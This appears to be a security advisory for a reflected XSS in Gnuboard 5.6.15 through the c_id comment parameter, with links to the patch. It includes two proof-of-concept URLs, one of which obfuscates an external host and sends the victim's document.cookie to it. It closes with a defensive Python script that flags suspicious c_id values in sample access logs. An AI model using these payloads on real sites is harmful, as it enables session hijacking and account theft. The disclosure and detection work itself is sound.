Gnuboard 5.6.15 open-source Git address:
https://github.com/gnuboard/gnuboard5
Patched Version: Gnuboard 5.6.16 https://sir.kr/g5_pds/7495
Patch history: https://github.com/gnuboard/gnuboard5/commit/002e43e5fb84b465357b445772c881e196e100d3
A reflected XSS occurs in Gnuboard5 5.6.15, the latest version at the time of this report.
If you have permission to write comments on a post, the vulnerability can be triggered after opening that post, through the c_id value, one of the hidden values required to write comments.
Below is the proof-of-concept (PoC) code. It can be tested by converting the domain you want to ASCII codes for the String.fromCharCode function.
PoC
http://127.0.0.1:8081/bbs/board.php?bo_table=free&wr_id=1&c_id=1"style=content-visibility:auto%20oncontentvisibilityautostatechange=alert(/tetest/)//
http://127.0.0.1:8081/bbs/board.php?bo_table=free&wr_id=1&c_id=1"style=content-visibility:auto%20oncontentvisibilityautostatechange=location.href=String.fromCharCode(104,116,116,112,115,58,47,47,121,112,119,109,108,118,105,46,114,101,113,117,101,115,116,46,100,114,101,97,109,104,97,99,107,46,103,97,109,101,115,47,116,63,99,61)%2Bdocument.cookie//
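For sites that cannot move to 5.6.16 immediately, access logs can be checked for requests shaped like the PoC above. The following is an added example, not code from the original page or from the Gnuboard project; it assumes a combined-format access log and that a legitimate c_id is always a numeric comment id (the page only shows c_id=1), and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /bbs/board.php?bo_table=free&wr_id=1&c_id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /bbs/board.php?bo_table=free&wr_id=1&c_id=1%22style=content-visibility:auto%20oncontentvisibilityautostatechange=alert(/tetest/)// HTTP/1.1" 200 5190
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /bbs/board.php?bo_table=free&wr_id=2 HTTP/1.1" 200 4980
203.0.113.8 - - [01/Jan/2024:10:00:12 +0000] "GET /bbs/board.php?bo_table=free&wr_id=3&c_id=42 HTTP/1.1" 200 5010
"""

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate c_id is a plain decimal comment id.
NUMERIC_ID_RE = re.compile(r"[0-9]+")


def suspicious_c_id_requests(log_text):
    """Return (client, decoded c_id) for board.php requests whose c_id is not numeric."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/bbs/board.php"):
            continue
        # parse_qs percent-decodes values, so %22 shows up as the quote
        # character that breaks out of the hidden input's value attribute.
        for value in parse_qs(url.query).get("c_id", []):
            if not NUMERIC_ID_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_c_id_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric c_id: {value!r}")
```

The same numeric-only rule can be enforced in front of the application (for example in a WAF or reverse-proxy rule) until the patched version is deployed.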
